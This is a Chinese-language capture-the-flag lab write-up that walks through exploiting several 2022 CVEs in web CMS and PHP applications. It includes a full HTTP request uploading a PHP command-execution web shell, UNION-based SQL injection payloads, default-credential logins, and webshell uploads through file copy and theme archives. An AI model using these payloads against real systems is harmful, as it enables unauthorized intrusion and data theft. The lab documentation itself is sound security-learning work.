春秋云镜免费靶场记录10.10

CVE-2022-23906(CMS Made Simple v2.2.15 RCE)

参考链接：http://dev.cmsmadesimple.org/bug/view/12502

访问/admin，以admin/123456登陆，在内容->File Manager中找到文件上传点

上传文件

上传成功后，选中文件点击copy，按下图配置复制文件并命名为xxx.php

成功后可以看到多出了刚才的php文件，直接获取flag即可


或者蚁剑链接，获取flag

CVE-2022-30887(Pharmacy Management System shell upload)

参考链接：https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html
上传poc：

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zeiqdtozk9gx9az693a.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type:multipart/form-data;boundary=---------------------------208935235035266125502673738631
Content-Length: 566
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1662902354,1664078966,1664530891,1665378480;
 chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=ec8193cd25017f638aa167cee7298e97339ab2de; 
Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1665384728; PHPSESSID=qbsbo3njtcrhucddoaf7cvd8ah
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

看到success后，访问/assets/myimages/shell.php?s=cat%20/flag读取flag

CVE-2022-29464(WSO2文件上传漏洞)

参考链接：https://github.com/hakivvi/CVE-2022-29464

访问链接cat/flag即可

CVE-2022-28525(ED01-CMS v20180505 存在SQL注入漏洞)

搜索编号得知漏洞点在：/admin/users.php?source=edit_user&id=1

因此对id进行操作，直接sqlmap梭哈就能注出所有结果，但是没有flag，看到前面的介绍，属实很难绷得住，于是对上传点进行操作

发现没任何过滤，直接传一个phpinfo发现解析，然后传一句话直连即可

CVE-2022-28512( Fantastic Blog (CMS) SQL注入)

参考文章：https://github.com/JiuBanSec/CVE/blob/main/Fantastic%20Blog%20CMS/SQL1.md

直接访问single.php,加单引号看到报错

探测字段长度,为9


探测回显字段,为2和4

直接注即可

sqlmap也可以成功

# 获取库名
id = "%27%20union%20select%201,database(),3,user(),5,6,7,8,9--+-"
# 获取表名
id = "%27%20union%20select%201,group_concat(table_name),3,user(),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+-"
# 获取列名
id = "%27%20union%20select%201,group_concat(column_name),3,user(),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=%27flag%27--+-"
# 获取数据
id = "%27%20union%20select%201,flag,3,user(),5,6,7,8,9%20from%20ctf.flag--+-"

 CVE-2022-32991(Web Based Quiz System SQL注入)

需要注册账号才可以，注册后登陆，在welcome.php中尝试p无果，点击start抓包，对step尝试无果，在eid中尝试发现问题

获取数据库长度

后面直接布尔盲注就可，上sqlmap

CVE-2022-28060(Victor CMS v1.0 存在sql注入)

参考链接：https://github.com/JiuBanSec/CVE/blob/main/VictorCMS%20SQL.md

登陆尝试万能密码

成功登陆，说明有sql注入，对user_name进行测试


后续脚本可以跑出所有内容，但是找不到flag，这个没啥别的思路了，下一题

CVE-2022-26965(Pluck-CMS-Pluck-4.7.16 后台RCE)

参考链接：https://www.youtube.com/watch?v=sN6J_X4mEbY
搜索CVE，得知是通过更新主题将压缩包中的webshell写入到服务器并解析的，因此找一个主题，在任意php文件下写入一句话木马，上传后拼接/data/themes/xxx/xxx.php即可访问shell，具体操作如下
上传主题位置（主题下载链接：https://github.com/pluck-cms/themes）：

修改任意主题：

打包后上传，然后蚁剑连接：


或者浏览器访问获取flag